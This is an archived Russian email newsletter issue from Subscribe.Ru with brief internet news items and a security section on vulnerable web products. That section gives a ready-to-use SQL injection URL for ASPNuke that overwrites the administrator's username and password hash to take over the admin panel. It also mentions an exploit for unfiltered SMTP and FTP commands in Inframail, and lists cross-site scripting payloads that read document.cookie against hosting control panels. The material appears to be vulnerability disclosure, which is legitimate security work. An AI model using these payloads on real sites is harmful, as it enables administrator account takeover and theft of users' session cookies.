Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Безопасность: Обзор продуктов


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Опасные продукты:
ASPNuke
Infradig Systems Inframail
Новости
Пользователи не считают кражей бесплатное скачивание музыки из Интернета

Британские эксперты сделали выводы, что убеждать пользователей не скачивать из интернета пиратские программы и игры бесполезно, так как люди не считают скачивание программ и другой интеллектуальной собственности кражей.

В Австралии впервые судят спамера

Австралийские власти обвиняют уроженца города Перт в рассылке 56 млн спамерских писем. Это первое подобное обвинение в судебной практике Австралии, которое было предъявлено после принятия нового антиспамового законодательства Australia's Spam Act.

Интернет — по канализации

Российские связисты ведут переговоры с руководителями служб ЖКХ об использовании тепловых и канализационных сетей для развития интернет-связи и цифрового телевидения.

В Австралии запретили сайты для самоубийц

В Австралии использование интернета для пропаганды идеи самоубийства или практических рекомендаций по его совершению будет запрещено законом.
Безопансность
Продукт: ASPNuke

Возможно применение SQl-инъекции к htttp://host/module/article/article/article.asp?articleid=1'
Для примера можно изменить учетную запись администратора:
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser %20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c' ,username='trapset'%20where%20userID=1%20--
в этом примере пароль и имя пользователя меняются на trapset и затем вы можете зайти в панель администратора www.example.com/module/admin
Продукт: Infradig Systems Inframail Advantage Server Edition 6.0

Ввод SMTP MAIL FROM-команд и FTP NLST-командж не проверяются и не фильтруются. О этой уязвимости было сообщено производителю, на что он рекомендовал просто обновить продукт.
Для использовании этой уязвимости был создан эксплоит, который находится на http://www.infradig.com/.
Cross-Site Scripting (CSS) для хостинг-контролеров всех версий

Путь: /admin/hosting/error.asp?error=
http://www.victim.com/admin/hosting/error.asp?error=Xss vul

Пример:
JavaScript код: <script>alert(document.cookie)</script>
http://www.victim.com/admin/hosting/error.asp?error=%3Cscript%3Ealert(document.cookie) %3C/script%3E

О CSS:
Атака при помощи Cross-site scripting обычно позволяет поместить в сценарий злонамеренный код на языке JavaScript, в месте где пользователь захочет. Областью использования может быть адресная строка, бюллетень комментариев, и так далее. Злонамеренный код обычно захватывает кукисы, которые могут позволить нападающему маскироваться под других пользователей, или выполнять атаки на удаленный сервер, который содержит БД паролей. Для работы можно использовать следующие команды:
<script> SRC="c:\boot.ini"></script>
<script>alert(src=C:\boot.ini)</script>
<script>alert(document.cookie)</script>
<script>alert('document.domain='+document.domain)</script>
<script>document.write(document.cookie)</script>
<script>alert('ActionSpider!')</script>
Если Вам нравится эта рассылка и Вы пользуетесь сведениями из неё, то можете поддержать автора, перечислив небольшое вознаграждение на R474348938531 или Z451490294903. Связаться со мной можно по ICQ 273214003.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Отписаться
Вспомнить пароль

В избранное